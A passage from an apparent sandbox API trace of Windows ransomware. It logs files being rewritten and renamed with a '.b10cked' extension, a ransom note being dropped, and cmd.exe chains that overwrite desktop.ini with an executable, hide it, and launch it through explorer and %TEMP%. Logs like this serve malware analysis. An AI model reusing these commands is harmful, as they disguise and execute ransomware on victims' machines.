lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xabfa [0131.299] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.299] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa712 [0131.299] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xabfa [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xabfa [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.300] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.300] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x55fc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x55fc, lpOverlapped=0x0) returned 1 [0131.301] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.301] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x55fc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x55fc, lpOverlapped=0x0) returned 1 [0131.301] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22012, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x55fe [0131.301] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x55fc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x55fc, lpOverlapped=0x0) returned 1 [0131.301] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22012, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x55fe [0131.301] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x55fc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x55fc, lpOverlapped=0x0) returned 1 [0131.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5d djXdWwSLPL XJ.xls", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5d djXdWwSLPL XJ.xls", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5d djXdWwSLPL XJ.xls", lpUsedDefaultChar=0x0) returned 20 [0131.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xabfa [0131.305] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.306] CloseHandle (hObject=0x114) returned 1 [0131.306] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\5d djXdWwSLPL XJ.xls", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS") returned 0x36 [0131.307] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0131.307] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa74, dwThreadId=0x958)) returned 1 [0131.312] CloseHandle (hObject=0x110) returned 1 [0131.312] CloseHandle (hObject=0x114) returned 1 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.312] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0131.312] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0131.312] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0131.312] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0131.312] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0131.313] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0131.313] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0131.313] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0131.313] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0131.313] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x968, dwThreadId=0xa80)) returned 1 [0131.489] CloseHandle (hObject=0x110) returned 1 [0131.489] CloseHandle (hObject=0x114) returned 1 [0131.489] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0xffffffff [0131.489] GetLastError () returned 0x2 [0131.489] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0131.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0131.493] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.493] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0131.493] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0131.493] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.493] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0131.493] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0131.493] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0131.493] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0131.494] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0131.494] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0131.494] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1") returned 0x29 [0131.494] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x162 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x162 [0131.494] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0131.494] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xaa4, dwThreadId=0xaa0)) returned 1 [0131.502] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0132.464] CloseHandle (hObject=0x114) returned 1 [0132.464] CloseHandle (hObject=0x110) returned 1 [0132.464] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.464] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0132.465] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0132.465] GetTickCount () returned 0x2a256 [0132.465] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18925388347) returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x61\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x62\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.465] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0132.465] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0132.465] CharUpperBuffW (in: lpsz="explorer.exe \"5OwEKsaDhMyqwxmS\" & type \"5OwEKsaDhMyqwxmS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x71 | out: lpsz="EXPLORER.EXE \"5OWEKSADHMYQWXMS\" & TYPE \"5OWEKSADHMYQWXMS\\[HID_NAME]\" > 